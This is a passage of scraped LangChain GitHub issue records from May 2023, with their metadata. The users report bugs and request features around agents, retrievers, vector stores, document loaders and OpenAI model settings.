conversational_agent.agent.create_prompt(system_message=sys_msg, tools=tools) conversational_agent.agent.llm_chain.prompt = prompt conversational_agent(input_query) ``` Output: The top json output is when calling retriever directly on user query. Latter part is output when initializing agent. <img width="1957" alt="image" src="https://github.com/hwchase17/langchain/assets/130352102/4c09e1c1-0493-4805-815b-b68871c6757e"> ### Motivation Its inconvenient to not be able to manipulate what the agents initial action_inputs are. Plus other languages can greatly benefit from such support. ### Your contribution I would like to hear from other people first and then make a PR.
Using agents with custom tools completely changes the input if question is asked in different language
https://api.github.com/repos/langchain-ai/langchain/issues/4561/comments
12
2023-05-12T08:10:18Z
2023-10-31T01:54:50Z
https://github.com/langchain-ai/langchain/issues/4561
1,707,169,022
4,561
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. 我通过langchain向openai进行提问,langchain会将我的提问与我的聊天历史记录合并为一个新的问题,然后再向openai进行提问。但是新的提问有时候与我旧的提问相差不小。 比如说我问langchain:你好 langchain提问openai:How can I assist you today? 所以我有的时候会得到一些奇怪的回答。为什么会这样以及我该怎么处理呢? ( i talk to openai by langchain, but langchain will trans my question to a new question by my question and chat history. sometimes i got strange answer! for example i talk to langchain: hello langchian talk to openai: How can I assist you today? so, i got strange answer semms unrelated to my origin question. why langchain do this,and how can i fix this ? ) ConversationalRetrievalChain(BaseConversationalRetrievalChain._call) ![image](https://github.com/hwchase17/langchain/assets/38252232/217a7169-5dc1-435b-b5da-fda9eaf0fa12) ### Suggestion: _No response_
我的提问被langchain修改了(langchain change my question)
https://api.github.com/repos/langchain-ai/langchain/issues/4555/comments
9
2023-05-12T06:01:15Z
2024-03-18T16:04:29Z
https://github.com/langchain-ai/langchain/issues/4555
1,706,981,762
4,555
[ "langchain-ai", "langchain" ]
### System Info I am using colab. ![image](https://github.com/hwchase17/langchain/assets/100080151/d1058dfb-f65d-41c6-be8f-806c9aef26d1) ### Who can help? @hwchase17 @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![image](https://github.com/hwchase17/langchain/assets/100080151/3292307a-04b8-4f92-8428-38b3e4655a35) ### Expected behavior ![image](https://github.com/hwchase17/langchain/assets/100080151/e3c42af8-9c72-48ab-8a63-d341225e4bf7)
Langchain python agent calculation is wrong!!!
https://api.github.com/repos/langchain-ai/langchain/issues/4551/comments
4
2023-05-12T04:59:05Z
2023-08-06T22:13:05Z
https://github.com/langchain-ai/langchain/issues/4551
1,706,926,023
4,551
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. When I using agent with a llm of gpt-3.5 and a search tool of google, the AI's response is always in English, regardless of my input being in Chinese. Are there any ideas on how to ensure that the input and output languages are consistent? ### Suggestion: _No response_
Any ideas on making input and output languages consistent?
https://api.github.com/repos/langchain-ai/langchain/issues/4550/comments
12
2023-05-12T04:45:55Z
2024-01-19T08:29:11Z
https://github.com/langchain-ai/langchain/issues/4550
1,706,917,102
4,550
[ "langchain-ai", "langchain" ]
### Issue with current documentation: I have translated a Chinese document and hope it is useful for Chinese developers. 在中国的 langchain 开发者,可以看中文了。 [www.langchain.com.cn](https://www.langchain.com.cn/) ### Idea or request for content: _No response_
我翻译了中文文档,希望对中国开发者有用
https://api.github.com/repos/langchain-ai/langchain/issues/4548/comments
5
2023-05-12T03:41:53Z
2023-09-16T13:22:15Z
https://github.com/langchain-ai/langchain/issues/4548
1,706,868,540
4,548
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I write a pyqt5 GUI and use the langchain to realize chat function. But it seems I cannot pack the langchian package by pyinstaller. ### Suggestion: _No response_
Issue: Can we use pyinstaller to pack the program with langchain
https://api.github.com/repos/langchain-ai/langchain/issues/4547/comments
30
2023-05-12T03:04:05Z
2024-03-18T16:04:25Z
https://github.com/langchain-ai/langchain/issues/4547
1,706,846,676
4,547
[ "langchain-ai", "langchain" ]
### Feature request Implement new output parser that looks for the first of either `self.true_val` or `self.false_val` in the output. ### Motivation LLMs like to elaborate. Unfortunately, `BooleanOutputParser` requires an exact match. `SmartBooleanOutputParser` should provide a more flexible communication interface. ### Your contribution I'm implementing this
SmartBooleanOutputParser
https://api.github.com/repos/langchain-ai/langchain/issues/4544/comments
1
2023-05-12T02:19:17Z
2023-09-10T16:18:52Z
https://github.com/langchain-ai/langchain/issues/4544
1,706,817,880
4,544
[ "langchain-ai", "langchain" ]
### System Info langchain:0.0.163 python:3.9 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction "There is no item named 'word/footnotes.xml' in the archive" ### Expected behavior can load .docx
UnstructuredWordDocumentLoader can not load .docx file
https://api.github.com/repos/langchain-ai/langchain/issues/4543/comments
5
2023-05-12T01:58:17Z
2023-09-19T16:11:17Z
https://github.com/langchain-ai/langchain/issues/4543
1,706,804,209
4,543
[ "langchain-ai", "langchain" ]
### System Info The creat_csv_agent function may have some bugs on the latest version of Langchain. I had a slightly older version on my local environment and the csv_agent was working with any csv. When i moved over the function to AWS Lambda where i was working with the latest version of Langchain, I keep getting an exceeded prompt length error (same exact dataset). The function will work with a smaller data set but something in the latest version of LC may be causing it to send too much to OpenAI ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import langchain from langchain.agents import create_csv_agent from langchain.llms import OpenAI import os import boto3 import tempfile file_name = 'XX' session = boto3.Session( aws_access_key_id='XX', aws_secret_access_key='XX' ) bucket_name = 'chatscreamingfrog' os.environ['OPENAI_API_KEY'] = 'XX' # Create an S3 resource object using the session s3 = session.client('s3') # Create a temporary file to download the CSV file from S3 with tempfile.NamedTemporaryFile() as temp_file: # Download the CSV file from S3 to the temporary file s3.download_file(bucket_name, file_name, temp_file.name) agent = create_csv_agent(OpenAI(temperature=0), temp_file.name,verbose = True) agent.run("show all Addresses with less than 10 Unique Inlinks") ### Expected behavior The agent executor should have returned my answer. However it is returning an exceeded prompt error.
create_csv_agent prompt errors in latest version
https://api.github.com/repos/langchain-ai/langchain/issues/4541/comments
2
2023-05-12T01:29:51Z
2023-09-10T16:18:57Z
https://github.com/langchain-ai/langchain/issues/4541
1,706,787,552
4,541
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I noticed that the max_token can be only set on the OpenAI object. I'm using the followin, where the openai object is initialized at startup: ``` llm_chain = LLMChain(prompt=prompt_template, llm=openai) results = llm_chain.apply(prompt_batch) ``` I pass 20 items per call, as specified in the OpenAI requests rate limitation. I would like to be able to estimate the max_token based on the prompt and the expected output and then pass it at the time of the request so to limit the cost of each requests. I noticed that the max token can be automatic but limited only to one prompt request. ### Suggestion: 1) make the max_token a parameter in the apply() or generate() or predict() methods 2) modify the current behavior to do not raise an exception when multiple prompt are provided and max_tokens = -1 to calculate the maximum max token length based on the input the first is preferred because gives more flexibility, the expected response does greatly depends on the prompt
Issue: max_tokens should be more flexible for OpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4540/comments
4
2023-05-12T01:05:42Z
2023-12-06T08:16:31Z
https://github.com/langchain-ai/langchain/issues/4540
1,706,770,187
4,540
[ "langchain-ai", "langchain" ]
### System Info langchain 0.0.166 Python 3.8.10 pygpt4all 1.1.0 ### Who can help? @Vowe ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain import PromptTemplate, LLMChain from langchain.llms import GPT4All from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler template = """Question: {question} Answer:""" prompt = PromptTemplate(template=template, input_variables=["question"]) callbacks = [StreamingStdOutCallbackHandler()] llm = GPT4All(model='ggml-gpt4all-j-v1.3-groovy.bin',backend='gptj',callbacks=callbacks,verbose=True) llm_chain = LLMChain(prompt=prompt,llm=llm) question = "What is Walmart?" print(llm_chain.run(question=question)) question = "Summarize the previous response so a child can understand it" print(llm_chain.run(question=question)) ### Expected behavior The above code snippet asks two questions of the gpt4all-j model. No memory is implemented in langchain. However, the response to the second question shows memory behavior when this is not expected. The response to the first question was " Walmart is a retail company that sells a variety of products, including clothing, electronics, and food. It is one of the largest retailers in the world, with over 2,000 stores in the United States alone. Walmart is a retail company that sells a variety of products, including clothing, electronics, and food. It is one of the largest retailers in the world, with over 2,000 stores in the United States alone." The response to the second question was "Walmart is a large retail store that sells a variety of things like clothes, electronics, and food. It is very big with many stores all over the United States. Walmart is a large retail store that sells a variety of things like clothes, electronics, and food. It is very big with many stores all over the United States."
gpt4all-j memory issue
https://api.github.com/repos/langchain-ai/langchain/issues/4536/comments
9
2023-05-11T20:57:02Z
2023-09-15T22:12:56Z
https://github.com/langchain-ai/langchain/issues/4536
1,706,545,458
4,536
[ "langchain-ai", "langchain" ]
### Feature request If unaware, Google has opened PaLM into public preview in Vertex AI in GCP. This uses different client libraries from the general-use PaLM API that was implemented in the base Langchain support for PaLM. ### Motivation As an enterprise user, I'd like to leverage the model endpoints that meet my organization's security and privacy requirements with LangChain. ### Your contribution I can open a PR, but as folks from Google like @brotchie having contributed, I wanted to make sure I wasn't duplicating work if I did this.
Vertex AI PaLM Support
https://api.github.com/repos/langchain-ai/langchain/issues/4532/comments
4
2023-05-11T19:43:07Z
2023-05-25T19:01:42Z
https://github.com/langchain-ai/langchain/issues/4532
1,706,438,031
4,532
[ "langchain-ai", "langchain" ]
### System Info ryzen 3600, 16gb ram, b450m ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I have been having trouble with querying multiple agents. The first agent comes out okay, but any others i attempt to query i get an axios error. I have a functions for creating a chat model, crating a conversation chain, and creating an agent with tools and a memory using the two former functions. Here is my code ```js // Create OpenAI Chat instance const createChat = (model, temp) => { debug(`Creating chat ${model} temp ${temp}.`); return new ChatOpenAI({ temperature: temp, modelName: model }); }; // Create Chain (Memory) using LangChain const createChain = (model) => { // Define the chat prompt template with a MessagesPlaceholder to store the conversation history const chatPrompt = ChatPromptTemplate.fromPromptMessages([ SystemMessagePromptTemplate.fromTemplate( "The following is a friendly conversation between a human and an AI. The AI is talkative and provides lots of specific details from its context. If the AI does not know the answer to a question, it truthfully says it does not know." ), new MessagesPlaceholder("history"), HumanMessagePromptTemplate.fromTemplate("{input}"), ]); // Create a ConversationChain with a BufferMemory to store the conversation history const chain = new ConversationChain({ memory: new BufferMemory({ returnMessages: true, memoryKey: "history" }), prompt: chatPrompt, llm: model, }); return chain }; // Create agent with tools and memory using LangChain const createAgent = async (model, memory) => { const embeddings = new OpenAIEmbeddings(); const tools = [ new WebBrowser({ model, embeddings }) ]; // Create agent with tools and memory const agent = await initializeAgentExecutorWithOptions(tools, model, { agentType: "chat-conversational-react-description" }, memory); return agent; } const easyAgent = async(llm, temp) => { const model = createModel(llm, temp); const chain = createChain(model); const agent = await createAgent(model, chain); return agent; } ``` The code works great! Until I try and make a new instance of an agent using the easyAgent() function. input values are 'gpt-3.5-turbo' for model and 0.5 for temp. Here are the first agent i created with easyAgent() agent: https://pastebin.com/y6trG6t0 Here are the second agent i create with easyAgent() agent: https://pastebin.com/DhfNyV4z As you can see both instances of the agent are the exact same. There is no difference between the two. This is what leads me to believe the issue is with langchain. here is my error when i use the .call() method on the new agent: ``` Error: Request failed with status code 401 at createError (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\core\createError.js:16:15) at settle (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\core\settle.js:17:12) at IncomingMessage.handleStreamEnd (C:\Users\Admin\Desktop\Code\LLM-Chat\node_modules\openai\node_modules\axios\lib\adapters\http.js:322:11) at IncomingMessage.emit (node:events:549:35) at endReadableNT (node:internal/streams/readable:1359:12) at process.processTicksAndRejections (node:internal/process/task_queues:82:21) ``` All i can find relating to the issue is users running out of tokens or [this bug](https://github.com/openai/openai-node/issues/145) ### Expected behavior I am expecting to be able to query the second agent just as i am the first.
Openai chat query call error
https://api.github.com/repos/langchain-ai/langchain/issues/4530/comments
2
2023-05-11T18:45:58Z
2023-09-10T16:19:01Z
https://github.com/langchain-ai/langchain/issues/4530
1,706,357,431
4,530
[ "langchain-ai", "langchain" ]
### Feature request As a user of LangChain, I would like to request the integration of HuggingFace Agents ([announcement](https://twitter.com/huggingface/status/1656334778407297027) and [docs](https://huggingface.co/docs/transformers/transformers_agents)) into LangChain. HuggingFace Agents is an experimental API that allows users to control over 100,000 HuggingFace models by talking to Transformers and Diffusers. It is a fully multimodal agent that can handle text, images, video, audio, and documents. HuggingFace Agents is designed to be extensible by design, and its tools are elementary, making it easy to create new tools and push them to the Hub. I believe that the integration of HuggingFace Agents into LangChain will greatly benefit users and make LangChain an even more powerful framework for developing applications powered by language models. ### Motivation LangChain has already integrated with [Hugging Face Hub](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_hub.html) and [Hugging Face Local Pipelines](https://python.langchain.com/en/latest/modules/models/llms/integrations/huggingface_pipelines.html), making it an ideal platform to integrate with HuggingFace Agents. By integrating HuggingFace Agents into LangChain, users will have access to a more powerful language model that can handle more complex queries and offer a chat mode. For example, HuggingFace Agents allows LangChain to create images using text-to-image [diffusion models](https://huggingface.co/models?pipeline_tag=text-to-image&sort=downloads) such as Stable Diffusion by @Stability-AI or similar diffusion models. ### Your contribution I can contribute in different ways.
HuggingFace Agents
https://api.github.com/repos/langchain-ai/langchain/issues/4528/comments
1
2023-05-11T17:09:12Z
2023-09-22T16:09:19Z
https://github.com/langchain-ai/langchain/issues/4528
1,706,226,555
4,528
[ "langchain-ai", "langchain" ]
@agola11 + @hwchase17 + @dev2049 thanks for the review and pushing the PR over the finish line! I'd like to add a few more tests in a follow up - are you willing to add mlflow + azureml-mlflow packages as test dependencies or should we explore some other options? _Originally posted by @akshaya-a in https://github.com/hwchase17/langchain/issues/4150#issuecomment-1540983848_
Adding mlflow tests
https://api.github.com/repos/langchain-ai/langchain/issues/4527/comments
3
2023-05-11T16:32:34Z
2023-09-12T16:23:08Z
https://github.com/langchain-ai/langchain/issues/4527
1,706,167,855
4,527
[ "langchain-ai", "langchain" ]
### System Info I was able to somehow fetch the document chunk id's from chroma db, but I did not get how can I delete a specific document using its document name or document id. I have gone thru all references did not find a solution for it. Insertion, Updation is there but not deletion. Can you please help on this? # Extract id of document chunks in vector database chroma_db.get()['ids'] Also, I had a doubt when we pass embeddings in Chroma, why we see embeddings = None when I run chroma_db.get() I could only see document chunks and their id when I tried displaying the info inside, so why are we not seeing embedding for each document chunk here? @hwchase17, it would be great if you can help on this, Thanks in advance. ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain.document_loaders import DirectoryLoader from langchain.embeddings import OpenAIEmbeddings documents_pdf = DirectoryLoader(directory_path, glob="**/*.txt").load() openai_embeddings = OpenAIEmbeddings(model="text-embedding-ada-002") chroma_db = Chroma.from_documents(doc_chunks, embedding = openai_embeddings ) chroma_db.get() # all id's in chroma db: list_of_chunk_ids = chroma_db.get()['ids'] print(len(list_of_chunk_ids)) ### Expected behavior 1. Solution on deletion 2. What all elements are stored in Chroma DB
Deletion issue in Chroma Vectorstore & its info on seeing doc id and embeddinsg stored
https://api.github.com/repos/langchain-ai/langchain/issues/4519/comments
11
2023-05-11T10:45:23Z
2024-02-14T16:14:03Z
https://github.com/langchain-ai/langchain/issues/4519
1,705,554,723
4,519
[ "langchain-ai", "langchain" ]
### System Info LangChain 0.0.165 on Google Colab ### Who can help? @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Just try to use FAISS and the Pinecone with the same data. After query with `similarity_search_with_score` the score is reversed. FAISS ``` docs = faiss_index.similarity_search_with_score("text to search", k=5) for doc in docs: score = doc[1] page_num = doc[0].metadata['page'] print(str(score) + " - " + page_num) 0.31319273 - 58 0.34054485 - 61 0.39556867 - 36 0.40675405 - 60 0.40916008 - 33 ``` Pinecone ``` docs = faiss_index.similarity_search_with_score("text to search", k=5) for doc in docs: score = doc[1] page_num = doc[0].metadata['page'] print(str(score) + " - " + page_num) 0.843403578 - 58.0 0.82972753 - 61.0 0.80216819 - 36.0 0.79670471 - 60.0 0.795202613 - 33.0 ``` ### Expected behavior All Vector Stores should use the same scoring
The scores of `similarity_search_with_score` are not standardized across Vector Stores
https://api.github.com/repos/langchain-ai/langchain/issues/4517/comments
8
2023-05-11T09:19:18Z
2024-03-18T21:50:45Z
https://github.com/langchain-ai/langchain/issues/4517
1,705,414,556
4,517
[ "langchain-ai", "langchain" ]
### System Info **Langchain version:** 0.0.162 **Platform**: Windows **python version**: 3.11.3 I am trying to load all **.eml** files from my Directory with LoaderClass: UnstructuredEmailLoader to build index , but i am getting error on load function. **error:** 'utf-8' codec can't decode byte 0x92 in position 141: invalid start byte **Code:** ``` def load_data(): if os.path.exists("./test"): # Load documents from data directory print('loading docs from directory ...') loader = DirectoryLoader('./test',loader_cls=UnstructuredEmailLoader) raw_documents = loader.load() print('loaded docs') #Splitting documents into chunks text_splitter = RecursiveCharacterTextSplitter( chunk_size=1000, chunk_overlap=200, ) documents = text_splitter.split_documents(raw_documents) print(len(documents)) # Changing source to point to the original document for x in documents: print(x) # Creating index and saving it to disk print("Creating index") db = FAISS.from_documents(documents, embeddings ) db.save_local("./index") else: raise Exception("No data or index found") ``` Following is the code i am using to read email: ``` def get_email(data): # add try catch raw_email_string = data[0][1].decode('utf-8') # Getting the email email_obj = Email(raw_email_string) return email_obj ``` The problem is that there are 0ver 5000 + emails, the error exception cant even tell that which file is causing issue. How can i fix this? ### Who can help? @hwchase17 @eyurtsev @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use code to test issue. ### Expected behavior 1. should load all email .eml files within the provided directory 2. In case of exception it should atleast print filename.
Unable to load .eml email filed from DirectoryLoader with class UnstructuredEmailLoader: utf-8' codec can't decode byte 0x92 in position
https://api.github.com/repos/langchain-ai/langchain/issues/4515/comments
4
2023-05-11T08:00:31Z
2023-09-29T16:07:45Z
https://github.com/langchain-ai/langchain/issues/4515
1,705,280,664
4,515
[ "langchain-ai", "langchain" ]
### System Info langchain[openai]==0.0.165 Ubuntu 22.04.2 LTS (Jammy Jellyfish) python 3.10.6 ### Who can help? @vowelparrot ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The OpenAI component requires `tiktoken` package, but if we install like below, the `tiktoken` package is not found. ``` langchain[openai]==0.0.165 ``` It's natural to add `tiktoken`, since there is a dependency in the `pyproject.toml` file. https://github.com/hwchase17/langchain/blob/46b100ea630b5d1d7fedd6a32d5eb9ecbadeb401/pyproject.toml#L35-L36 Besides, the missing of `tiktoken` would cause an issue under some dependency pinning tool, like bazel or [jazzband/pip-tools](https://github.com/jazzband/pip-tools) ``` Traceback (most recent call last): File "/home/ofey/.cache/bazel/_bazel_ofey/90bb890b04415910673f256b166d6c9b/sandbox/linux-sandbox/15/execroot/walking_shadows/bazel-out/k8-fastbuild/bin/src/backend/services/world/internal/memory/test/test_test.runfiles/pip_langchain/site-packages/langchain/embeddings/openai.py", line 186, in _get_len_safe_embeddings import tiktoken ModuleNotFoundError: No module named 'tiktoken' ... File "/home/ofey/.cache/bazel/_bazel_ofey/90bb890b04415910673f256b166d6c9b/sandbox/linux-sandbox/15/execroot/walking_shadows/bazel-out/k8-fastbuild/bin/src/backend/services/world/internal/memory/test/test_test.runfiles/pip_langchain/site-packages/langchain/embeddings/openai.py", line 240, in _get_len_safe_embeddings raise ValueError( ValueError: Could not import tiktoken python package. This is needed in order to for OpenAIEmbeddings. Please install it with `pip install tiktoken`. ``` ### Expected behavior Add a dependency in `pyproject.toml` ``` [tool.poetry.extras] ... openai = ["openai", "tiktoken"] ``` Actually I'm using langchain with bazel, this is my project: [ofey404/WalkingShadows](https://github.com/ofey404/WalkingShadows)
[pyproject.toml] add `tiktoken` to `tool.poetry.extras.openai`
https://api.github.com/repos/langchain-ai/langchain/issues/4513/comments
0
2023-05-11T07:54:40Z
2023-05-11T19:21:07Z
https://github.com/langchain-ai/langchain/issues/4513
1,705,271,162
4,513
[ "langchain-ai", "langchain" ]
I have developed a chatbot using **Langchain's OpenAI LLM (text-davinci)** model and added my own contextual data using the **llama index (GPT index)** on top of GPT's existing data. I'm facing an issue with a specific scenario in my chatbot. I have included the following FAQ in my training data, which consists of a large list of questions: *Q: Who is the Prime Minister of India? A: The Prime Minister of India is John Doe.* However, when I ask the bot this question, I want it to consistently provide this specific answer. While it does give the desired answer sometimes, most of the time it retrieves the answer from the internet or its own corpus, stating that the Prime Minister of India is Narendra Modi. Essentially, I want complete control over the response generated by GPT when I ask questions from my training dataset. However, I also want GPT to utilize its own corpus to answer questions that are not part of my training dataset. For instance, if I ask a question like "Tell me something about European culture," which is not in my training dataset, GPT should provide a response based on its own knowledge. But when I enquire about the "PM of India," it should always respond with "John Doe." It is important to note that this is **not a typical fine-tuning scenario**, as we are not looking to identify patterns in the questions. Fine-tuning fails when we ask questions like "Who is the wife of the PM?" since it provides the same answer as "Who is the PM?" I would greatly appreciate any suggestions or assistance regarding this matter.
Get response from my training data using a GPT-based chatbot
https://api.github.com/repos/langchain-ai/langchain/issues/4512/comments
4
2023-05-11T07:23:16Z
2023-09-15T16:13:58Z
https://github.com/langchain-ai/langchain/issues/4512
1,705,225,886
4,512
[ "langchain-ai", "langchain" ]
### System Info I am trying to use latest gpt-4-32k model with langchain ChatOpenAI but I am getting the error ``` The model: `gpt-4-32k` does not exist```. so can we use other models except base model of openai ? ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from flask_socketio import emit from urllib.parse import urlparse from langchain.embeddings import OpenAIEmbeddings from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.vectorstores import Pinecone from langchain.chat_models import ChatOpenAI from langchain.chains import LLMChain from langchain.chains.question_answering import load_qa_chain from langchain.prompts import PromptTemplate import openai import pinecone import os import shutil import uuid import time import json import store.main as store from controller.scrape import ScrapeSite import services.calltype as CalltypeService import services.organization as OrganizationService # create completion process chain def create_completion_llm_chain(self): llm = ChatOpenAI(temperature=0, model_name='gpt-4-32k', max_tokens=2048, request_timeout=120) chain = load_qa_chain(llm, chain_type='stuff') return chain # generate llm chain chain = self.create_completion_llm_chain() query = 'here I added my query' # process prompt with sources on gpt response = chain.run(question=query, input_documents=sourceDocs) ``` using this token, you will get the error, ``` The model: `gpt-4-32k` does not exist``` ### Expected behavior It should work with the any model that provides by the openAI
Can't use gpt-4-32k model with ChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4511/comments
5
2023-05-11T07:18:18Z
2023-11-16T16:07:57Z
https://github.com/langchain-ai/langchain/issues/4511
1,705,219,365
4,511
[ "langchain-ai", "langchain" ]
### System Info - langchain: 0.0.163 - python: 3.9.16 - OS: Ubuntu 22.04 ### Who can help? @shibanovp @hwchase17 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: Getting error when running this code snippet: ```python from langchain.embeddings import OpenAIEmbeddings class AzureOpenAIEmbeddings(OpenAIEmbeddings): pass ``` Error: ``` Traceback (most recent call last): File "test.py", line 3, in <module> class AzureOpenAIEmbeddings(OpenAIEmbeddings): File "pydantic/main.py", line 139, in pydantic.main.ModelMetaclass.__new__ File "pydantic/utils.py", line 693, in pydantic.utils.smart_deepcopy File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 230, in _deepcopy_dict y[deepcopy(key, memo)] = deepcopy(value, memo) File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 270, in _reconstruct state = deepcopy(state, memo) File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 210, in _deepcopy_tuple y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 210, in <listcomp> y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 230, in _deepcopy_dict y[deepcopy(key, memo)] = deepcopy(value, memo) File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 264, in _reconstruct y = func(*args) File "../lib/python3.9/copy.py", line 263, in <genexpr> args = (deepcopy(arg, memo) for arg in args) File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 210, in _deepcopy_tuple y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 210, in <listcomp> y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 264, in _reconstruct y = func(*args) File "../lib/python3.9/typing.py", line 277, in inner return func(*args, **kwds) File "../lib/python3.9/typing.py", line 920, in __getitem__ params = tuple(_type_check(p, msg) for p in params) File "../lib/python3.9/typing.py", line 920, in <genexpr> params = tuple(_type_check(p, msg) for p in params) File "../lib/python3.9/typing.py", line 166, in _type_check raise TypeError(f"{msg} Got {arg!r:.100}.") TypeError: Tuple[t0, t1, ...]: each t must be a type. Got (). ``` ### Expected behavior Expect to allow subclass as normal.
Cannot subclass OpenAIEmbeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4498/comments
0
2023-05-11T04:42:23Z
2023-05-17T01:35:21Z
https://github.com/langchain-ai/langchain/issues/4498
1,705,053,735
4,498
[ "langchain-ai", "langchain" ]
